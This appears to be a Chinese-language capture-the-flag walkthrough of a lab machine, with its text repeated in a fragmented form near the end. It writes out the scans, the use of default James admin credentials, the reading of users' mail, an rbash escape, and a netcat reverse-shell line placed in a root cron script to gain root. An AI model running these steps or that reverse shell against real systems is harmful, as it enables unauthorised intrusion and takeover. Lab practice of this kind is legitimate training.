Open cha0s32 opened 9 months ago
全端口扫描,查询目标靶机开放端口和服务
sudo nmap -p- -n -v -sS --max-retries=0 172.16.33.35
进行服务版本扫描
nmap -p22,25,80,110,119,4555 -sV -A 172.16.33.35
发现有陌生服务james-admin,尝试用searchsploit看看是否有利用脚本
james-admin
searchsploit
有几个版本符合的脚本,尝试利用,但都不成功
查看脚本具体内容,发现james-admin默认账号密码都为root, 尝试登录
root
使用help查看可用命令,注意到有枚举用户的命令listusers 和修改密码的命令setpassword,修改各用户密码,然后登录POP3 邮箱服务,看各用户的邮件,命令如下:
help
listusers
setpassword
POP3
nc -C 172.16.33.35 110 USER mindy PASS 123 LIST # 列出所有邮件 RETR 1 # 查看对应邮件
发现mindy的邮件中有账号密码的泄漏,尝试拿这个账号密码去登录远程服务器
mindy
登录成功!尝试修改密码,发现Shell被限制,为rbash
Shell
rbash
尝试绕过rbash, 这里使用的方法是登录时加入 -t "bash --noprofile"
-t "bash --noprofile"
ssh mindy@172.16.33.35 -t "bash --noprofile"
登录成功后发现已成功绕过。
跑一下./linpeas.sh提权脚本,发现没什么发现
./linpeas.sh
可以查看一下系统各个用户的进程,特别关注一下james的
james
ps aux | grep james
发现有一个run.sh在opt目录下,查看opt目录时发现有一个tmp.py文件,该文件的权限是所有用户可读可写可执行
run.sh
opt
tmp.py
也可以这样查询
find / -user root -perm -o=w -type f 2>/dev/null | grep -v 'proc\|sys'
通过查看该文件内容,判断该文件应该是一个定时删除tmp目录内文件的脚本,可尝试写入自己的反弹shell
tmp
echo 'import os;os.system("/bin/nc 10.8.0.17 777 -e /bin/bash")' > tmp.py
等几分钟后获得shell,获得root权限
信息收集阶段
全端口扫描,查询目标靶机开放端口和服务
进行服务版本扫描
发现有陌生服务
james-admin,尝试用searchsploit看看是否有利用脚本有几个版本符合的脚本,尝试利用,但都不成功
查看脚本具体内容,发现
james-admin默认账号密码都为root, 尝试登录使用
help查看可用命令,注意到有枚举用户的命令listusers和修改密码的命令setpassword,修改各用户密码,然后登录POP3邮箱服务,看各用户的邮件,命令如下:利用漏洞拿shell
发现
mindy的邮件中有账号密码的泄漏,尝试拿这个账号密码去登录远程服务器登录成功!尝试修改密码,发现
Shell被限制,为rbash尝试绕过
rbash, 这里使用的方法是登录时加入-t "bash --noprofile"登录成功后发现已成功绕过。
跑一下
./linpeas.sh提权脚本,发现没什么发现提权
可以查看一下系统各个用户的进程,特别关注一下
james的发现有一个
run.sh在opt目录下,查看opt目录时发现有一个tmp.py文件,该文件的权限是所有用户可读可写可执行也可以这样查询
通过查看该文件内容,判断该文件应该是一个定时删除
tmp目录内文件的脚本,可尝试写入自己的反弹shell等几分钟后获得shell,获得root权限